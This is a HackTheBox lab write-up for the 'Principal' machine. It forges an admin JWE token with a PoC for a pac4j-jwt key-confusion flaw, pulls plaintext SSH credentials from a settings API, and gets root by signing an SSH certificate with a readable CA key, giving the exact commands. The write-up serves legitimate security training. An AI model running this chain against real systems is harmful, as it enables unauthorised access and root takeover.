## https://sploitus.com/exploit?id=DCE7EEC0-E42F-5105-87F4-FBCC4CDE31C4
# HackTheBox โ Principal
**Difficulty:** Medium
**OS:** Linux
**Platform:** HackTheBox
---
## Overview
Web application running pac4j-jwt v6.0.3 โ vulnerable to CVE-2026-29000. The public RSA key is exposed unauthenticated via a JWKS endpoint and can be used to forge a valid admin JWE token, bypassing authentication entirely. With admin access, plaintext SSH credentials are recovered from the settings API. The service account is a member of the `deployers` group with read access to an SSH CA private key trusted by sshd โ signing a certificate granting root access completes the box.
---
## 1. Enumeration
Browsed to the web application and viewed page source. Found the main JavaScript bundle at `/static/js/app.js`.
Key API endpoints identified inside `app.js`:
```
/api/auth/login
/api/auth/jwks :8080/api/auth/jwks
# Returns RSA public key (kid: enc-key-1)
```
CVE-2026-29000 allows the public key to be used to forge a valid JWE token โ the library incorrectly accepts tokens encrypted with the public key instead of requiring the private key.
Used the PoC to generate a forged admin token:
```bash
python3 poc.py \
--jwks http://:8080/api/auth/jwks \
--user admin \
--role ROLE_ADMIN
```
---
## 3. Admin API Access
Used the forged token as a Bearer token in Burp Repeater:
```
Authorization: Bearer
```
**GET /api/dashboard** โ 200 OK
- Confirmed role: `ROLE_ADMIN`
- Activity log showed `CERT_ISSUED` actions for user: `svc-deploy`
**GET /api/settings** โ 200 OK
- SSH credentials found in plaintext in the security config
- SSH certificate auth enabled
- SSH CA path: `/opt/principal/ssh/`
---
## 4. Initial Access
SSH'd in using credentials recovered from `/api/settings`:
```bash
ssh svc-deploy@
```
User flag retrieved.
---
## 5. Privilege Escalation โ SSH CA Signing
`svc-deploy` is in the `deployers` group with read access to `/opt/principal/ssh/`:
```bash
ls -la /opt/principal/ssh/
# ca โ RSA 4096-bit CA private key (readable by deployers)
# ca.pub โ CA public key
# README.txt โ confirms CA is trusted by sshd
```
The CA private key is readable. Since sshd trusts this CA, any certificate signed by it is accepted โ including one granting root access.
```bash
# Generate a new keypair
ssh-keygen -t ed25519 -f /tmp/privesc
# Sign with the CA, granting principal 'root'
ssh-keygen -s /opt/principal/ssh/ca -I pwned -n root -V +1h /tmp/privesc.pub
# SSH as root
ssh -i /tmp/privesc root@
```
Root flag retrieved.
---
## Flags
- **User:** `/home/svc-deploy/user.txt`
- **Root:** `/root/root.txt`
---
## Key Takeaways
- Always check JWT library versions during web app recon โ pac4j-jwt is common in Java applications.
- CVE-2026-29000: pac4j JWE key confusion โ public key accepted where private key is required.
- API settings endpoints often leak credentials in plaintext โ always enumerate all authenticated routes once you have a valid token.
- If a service account can read an SSH CA private key trusted by sshd, you can sign a certificate as any principal including root. Check group memberships and CA key permissions during post-exploitation.